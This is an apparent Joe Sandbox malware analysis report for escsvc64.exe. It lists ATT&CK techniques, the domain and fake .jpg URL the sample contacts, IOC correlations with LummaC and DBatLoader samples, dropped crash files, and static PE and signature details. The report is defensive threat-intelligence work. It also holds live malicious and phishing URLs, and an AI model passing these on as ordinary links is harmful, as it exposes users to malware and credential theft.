Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	14 Windows Service	14 Windows Service	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Service Execution	1 DLL Side-Loading	1 Process Injection	1 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Native API	Logon Script (Windows)	1 DLL Side-Loading	2 Obfuscated Files or Information	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
escsvc64.exe	7%	Virustotal		Browse

Source	Detection	Scanner	Label
https://www.dssdhome.xyz/	0%	Avira URL Cloud	safe
https://www.dssdhome.xyz/11/xin/escsvc64.jpg	0%	Avira URL Cloud	safe
https://www.dssdhome.xyz:443/11/xin/escsvc64.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mooscc.b-cdn.net	212.102.46.118	true	false	unknown
206.23.85.13.in-addr.arpa	unknown	unknown	false	high
www.dssdhome.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.dssdhome.xyz/11/xin/escsvc64.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://www.dssdhome.xyz:443/11/xin/escsvc64.jpg	escsvc64.exe, 00000000.00000002.1717351148.0000000000476000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dssdhome.xyz/	escsvc64.exe, 00000000.00000002.1717351148.0000000000495000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1259786881.0000000000495000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.102.46.118	mooscc.b-cdn.net	Italy		60068	CDN77GB	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590615
Start date and time:	2025-01-14 11:25:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	escsvc64.exe
Detection:	MAL
Classification:	mal52.troj.winEXE@2/5@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 13 Number of non-executed functions: 78
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 40.126.32.140, 13.107.246.45, 4.175.87.197, 13.85.23.206, 20.12.23.50
Excluded domains from analysis (whitelisted): login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
212.102.46.118	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse
	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTz	Get hash	malicious	Unknown	Browse
	https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604	Get hash	malicious	Unknown	Browse
	https://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3nps	Get hash	malicious	Unknown	Browse
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse
	http://t.co/626Aq6uRYN	Get hash	malicious	Unknown	Browse
	https://klkl9.b-cdn.net/2.txt	Get hash	malicious	Unknown	Browse
	https://whimsical.com/project-960-2024-doc-KUa9Z37ZsDmpPxB99pof8A	Get hash	malicious	Unknown	Browse
	https://portal.h-isac.org/s/store#/store/checkout/a1J7V00000aRurx	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mooscc.b-cdn.net	EBAbsk8ydv.exe	Get hash	malicious	Unknown	Browse	169.150.247.37
mooscc.b-cdn.net	EBAbsk8ydv.exe	Get hash	malicious	Unknown	Browse	169.150.247.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CDN77GB	Absa Remittance Advice.docx	Get hash	malicious	Unknown	Browse	212.102.56.178
	https://mmrtb.com/bonus/com-se-5609/global-bb.php?c=4yzi190z6iz1&k=9b48c9184ff290e347cb73c9f3a90c2b&country_code=SE&carrier=Spring%20Mobil&country_name=Sweden&region=Stockholms%20Lan&city=Stockholm&isp=Tele2%20SWIPnet&lang=sv&os=Windows%2010&osv=&browser=Chrome&browserv=131&brand=Desktop&model=Desktop&marketing_name=Desktop&tablet=4&rheight=768&rwidth=768&e=	Get hash	malicious	Unknown	Browse	212.102.56.178
	https://ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/	Get hash	malicious	Unknown	Browse	185.93.3.244
	https://fleek.ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/	Get hash	malicious	Unknown	Browse	185.93.3.244
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	212.102.46.118
	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse	185.93.2.242
	https://metafeedbackservice.com/606967319425038/form/	Get hash	malicious	Unknown	Browse	84.17.53.42
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse	89.187.179.132
	http://atozpdfbooks.com	Get hash	malicious	Unknown	Browse	195.181.175.41
	https://app.planable.io/review/0OPaw36t6M_k	Get hash	malicious	HTMLPhisher	Browse	195.181.175.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	random.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	yTRd6nkLWV.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	XhlpAnBmIk.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	k7h8uufe6Y.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	212.102.46.118
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	212.102.46.118
	8e8JUOzOjR.exe	Get hash	malicious	DBatLoader	Browse	212.102.46.118
	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	212.102.46.118

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_escsvc64.exe_53d1627f168be861b92b51d2acfa94936fb4840_2aa0144e_e52d448c-5098-4d51-9085-3b96801b7a62\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9404942092561486
Encrypted:	false
SSDEEP:	96:vtFzbbhOs0A1+i4nuQXIDcQfc6K/cEScw3Qe6+HbHg/8BRTf3o8Fa9KLnNFhOy9w:lpbbhO/0x2IFjQTHzuiFrZ24lO8l
MD5:	408CA55F262F38FB1B9E0C2EC67A3844
SHA1:	C0434B15CC6317BB6CF864DFD8BF87F0C19968BE
SHA-256:	BA2BCB9E4B62BF0FA3243B34E5B7C4B187D59CC33292670D41172113B614CF42
SHA-512:	2F2D0190E740CDE74A5D933837C24A44DE478A4E90AF16752FE9B248BE7508DE14F5E24ABFAA7AFEAC4FF1929E5E5F40163EBBAC4E1D8D0B3DF9956D899CE610
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.2.3.9.6.7.5.6.3.9.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.2.3.9.6.8.0.9.5.1.5.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.2.d.4.4.8.c.-.5.0.9.8.-.4.d.5.1.-.9.0.8.5.-.3.b.9.6.8.0.1.b.7.a.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.0.6.f.1.b.2.-.4.e.b.c.-.4.6.6.9.-.8.b.b.3.-.1.2.1.5.c.b.1.3.d.b.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.s.c.s.v.c.6.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.s.c.S.v.c.6.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.5.4.-.0.0.0.1.-.0.0.1.4.-.4.f.4.8.-.a.2.b.7.6.e.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.7.e.7.5.6.0.5.1.d.b.7.7.3.8.a.6.a.c.3.f.6.4.d.c.8.0.e.2.9.0.0.0.0.0.0.0.0.0.!.0.0.0.0.e.0.e.3.0.f.4.9.e.8.2.5.0.5.c.a.f.9.e.7.8.5.2.a.1.0.7.1.b.b.c.e.8.1.d.8.f.c.d.c.!.e.s.c.s.v.c.6.4...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC59B.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Jan 14 10:26:07 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	125902
Entropy (8bit):	2.0063783210661503
Encrypted:	false
SSDEEP:	768:ie9jSDTV9OB8Ne07z2vvhLEWNmBTVQ95kHgvGJ0by6:ljSTVluEHOGJ0
MD5:	E5E32FAE085CFB30401932E6646DD503
SHA1:	AE894CD16F3862AD46193FFBF445C940BD047B2E
SHA-256:	0EDEC0400C884952B8BA9DF9EDA21911861828088EAAAD49E6A1925EBD6E7391
SHA-512:	2F6EA7D9B7FF1F8515507BE7B91C4FAD2A7E6EEB892D7317D0F8CE84DF4851736F838678575F2473AB16169516D68D21C0142D27631FBA6604E096C93B2D6BC9
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........;.g............T...........D...t.......$.......................T....]..........l.......8...........T...........p6..^...........h/..........T1..............................................................................eJ.......1......Lw......................T.......T....;.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC696.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8714
Entropy (8bit):	3.7032935300267176
Encrypted:	false
SSDEEP:	192:R6l7wVeJRS/6fe6YNuChjLlWgmfNMprH89b9bFkfV3jm:R6lXJUr6YU2RWgmfNR9b2fl6
MD5:	76E14F9260D07766E1010D5C9C6649BE
SHA1:	3DC2D9630C76B044A2E96B95F621783F405F94D0
SHA-256:	48436DB04C6DA03516A01F9CAD4CFE234C5BC5D896670F66526367D90E9BCA37
SHA-512:	6689CB58E3F76F7505F57C1BB0B0F019E431B2A4129DD1CD765A84A6228DA93984839FB265810257810BBC88196C3235E214D7E6B3EBA713B224C86521A2E7D2
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6C6.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4690
Entropy (8bit):	4.442287783337287
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+rJg771I9dSWpW8VYcKYm8M4JnUFuyq85bXWrrkIJ4d:uIjf+FI7Gz7VnJniWrrkY4d
MD5:	04A54381BF86F471E05F315F989EA60F
SHA1:	A146F3DFFB40F630E1340C0012DF03B67BC8BDF3
SHA-256:	A284AC25F9DB208759E3680BABC04A9C3566401464CD67F10F7E74AF6B47752F
SHA-512:	1A21A2E3A5B5371A52DB399A016909085DAA0E47AD906E6E84EE5C0F864440E692EBB50F68FC5045AF5D1E345165CC62B3892A9E67FAE02F2C5506538589EAF1
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416865284659961
Encrypted:	false
SSDEEP:	6144:rcifpi6ceLPL9skLmb0mfSWSPtaJG8nAgex285i2MMhA20X4WABlGuN95+:Qi58fSWIZBk2MM6AFBno
MD5:	9D50456E45DF3E1D0024EC3CFDCB3A19
SHA1:	EEA900D835FA52E52606C66B150224FF9DB603C3
SHA-256:	F0E49EEB27E6F08854A4D6212A998DFD26E7208797FA36302CDB03CA789E7FD9
SHA-512:	0917B986378FFFC5AA50FD9E8B1E07CE1BAC8A39E944334B9D8C23934E11920B4D1DFF31D5D32AD5DB11774AE19B36192EBE5F007D87C36B3102D7104E829E5D
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...nf..............................................................................................................................................................................................................................................................................................................................................*...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	5.960564454003527
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	escsvc64.exe
File size:	144'560 bytes
MD5:	525ea9523a2afe76d2eaebc4a6b923eb
SHA1:	e0e30f49e82505caf9e7852a1071bbce81d8fcdc
SHA256:	53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
SHA512:	3e2e521881f044adf82f380ed10d7eb217ec252a33f9cb146249e6bf8d5aabc2934f3ac67b0bc0fab431dbcb18e153632896c3b63358c27d9233485f14cbd61c
SSDEEP:	3072:L507+DpnZ7olJZm4AyU0Rc4OSSIfO0mZxQeUF53Gbph1s27T:u72zMnQ4gWc4btfO02xi/Gbph1R7T
TLSH:	7CE3C492621044A4F75A47349952E5D597A57C3807E4E3CFE238BE362E322D36E3B24F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.B..g,N.g,N.g,N:.QN.g,N:.BN6g,N:.WN.g,N.g-N.g,N:.AN{g,N:.^N.g,N:.PN.g,N:.TN.g,NRich.g,N........PE..d......O..........#........

File Icon


Icon Hash:	8a80809292808001

Static PE Info

General

Entrypoint:	0x140003580
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4FB4DD14 [Thu May 17 11:12:20 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90807f1f3b7b31817516f1c58a60288f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/07/2011 20:00:00 12/07/2012 19:59:59
Subject Chain	CN=SEIKO EPSON Corporation, OU=Information Service & Support Department, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=SEIKO EPSON Corporation, L=Suwa-shi, S=Nagano, C=JP
Version:	3
Thumbprint MD5:	CA608B34C5C7033C02C006EFF7FC9775
Thumbprint SHA-1:	FBE1BDFDB27AA07A4EBE3E97A22F07BC6C70250F
Thumbprint SHA-256:	507DFC2E866302C1089DB07CDBCEE0AD034A3F8A335DA0DDA1AD508E26436A9A
Serial:	7524DBFE413001B3B345768A4F60DF46

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA394B3E70Ch
dec eax
add esp, 28h
jmp 00007FA394B39143h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
mov edx, 00000008h
lea ecx, dword ptr [edx+18h]
call 00007FA394B3E8C2h
dec eax
mov ecx, eax
dec eax
mov ebx, eax
call 00007FA394B3BC07h
dec eax
test ebx, ebx
dec eax
mov dword ptr [00015190h], eax
dec eax
mov dword ptr [00015181h], eax
jne 00007FA394B3943Bh
lea eax, dword ptr [ebx+18h]
dec eax
add esp, 20h
pop ebx
ret
dec eax
mov dword ptr [ebx], 00000000h
xor eax, eax
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
inc ecx
push ebp
inc ecx
push esi
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
call 00007FA394B3CC44h
nop
dec eax
mov ecx, dword ptr [0001513Fh]
call 00007FA394B3BD67h
dec esp
mov ebp, eax
dec eax
mov ecx, dword ptr [00015128h]
call 00007FA394B3BD58h
dec eax
mov esi, eax
dec ecx
cmp eax, ebp
jc 00007FA394B394CCh
dec eax
mov edi, eax
dec ecx
sub edi, ebp
dec esp
lea esi, dword ptr [edi+08h]
dec ecx
cmp esi, 08h

Rich Headers

Programming Language:

[ASM] VS2005 build 50727
[C++] VS2005 build 50727
[IMP] VS2005 build 50727
[ C ] VS2005 build 50727
[RES] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13718	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0xc390	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x19000	0xf9c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21800	0x1cb0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10450	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x3d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe400	0xe400	312b0cc7903c77314065737aa0b6f840	False	0.5623629385964912	data	6.434210349442922	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x4434	0x4600	0c1cbce9edc1dd89be5cc3a37d2c98eb	False	0.382421875	data	5.262140167496945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15000	0x3780	0x1600	29743b577f64cf1dd6827d8241e7bc32	False	0.16459517045454544	data	1.9076248479232016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x19000	0xf9c	0x1000	dcbd733158aa416708b06ffa52c15e3e	False	0.477783203125	data	4.8653578721712645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0xc390	0xc400	933c8a2922c9e09da0bbdc4dcc5f3b3f	False	0.134765625	data	4.424711281922116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a430	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x1a718	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x1a840	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x1b6e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x1bf90	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
